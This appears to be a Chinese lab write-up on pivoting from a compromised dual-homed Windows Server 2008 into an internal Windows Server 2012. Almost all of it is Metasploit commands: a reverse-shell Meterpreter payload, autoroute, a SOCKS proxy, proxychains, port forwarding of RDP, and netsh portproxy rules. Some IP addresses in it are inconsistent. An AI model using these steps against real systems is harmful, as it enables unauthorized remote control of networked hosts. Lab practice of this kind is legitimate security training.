0x00 實驗環境
攻擊機:win(192.168.43.10)+kali(192.168.43.243)
受害機:
winserver2008(IP:192.168.43.146、192.168.127.157;雙網卡,一個公網一個內網)
winserver2012(IP:192.168.127.160;僅主機:一個內網)
0x01 實驗效果
在已經拿到winserver2008服務器的前提下,通過msf與proxychains搭建隧道能通往winserver2012的隧道,獲取winserver2012的服務器權限。
(1)假設已拿到winserver2008的服務器權限,用msf做演示:
msf生成exe控winserver2008:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.234 LPORT=12345 -f exe > ./test.exe
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.43.234 set LPORT 12345 run
此時查看一下路由:
route
run autoroute -s 192.168.127.0
run autoroute -p
background
然后搜索可以做代理的模塊,並使用它:
use auxiliary/server/socks_proxy
show options set username admin set password admin
然后run:
run
#使用proxychains或者proxifier測試一下是否成功:
(1)proxifier是成功的:
(2)使用proxychains測試——需要先自行安裝:
sudo apt-get install proxychains
發現是可以使用的:
上述即為msf作代理的方法。
(3)小tips:
如果內網的服務器3389端口不出網,可以使用msf轉發至別的端口:
首先代理啟動msf:
proxychains msfconsole
注:可獲取192.168.127.160服務器權限:
msfvenom -p windows/meterpreter/bind_tcp LPORT=9797 -f exe > ./t.exe
注:設置代理結束后,可在43.x的shell的基礎上進行端口轉發,只要能訪問到127.160主機的3389端口就能將3389端口轉發出來:
portfwd add -l 9837 -r 192.168.127.160 -p 3389
kali即可直接訪問登錄127.160主機:
注:在反向連接的情況下,需要做端口映射:
https://www.cnblogs.com/xiaozi/p/9453944.html
假定需要通過192.168.127.160的3389端口轉發到8787端口,則需要在192.168.43.157主機的命令行輸入如下語句:
netsh interface portproxy add v4tov4 listenport=8787 listenaddress=192.168.127.160 connectport=3389 connectaddress=192.168.127.160
生成一個8081的木馬,在43.157主機本機的shell內執行端口映射,映射8081端口到9808:
netsh interface portproxy add v4tov4 listenport=8081 listenaddress=0.0.0.0 connectport=9809 connectaddress=192.168.127.157
netsh interface portproxy delete v4tov4 listenport=8081 listenaddress=192.168.127.157
netsh interface portproxy show all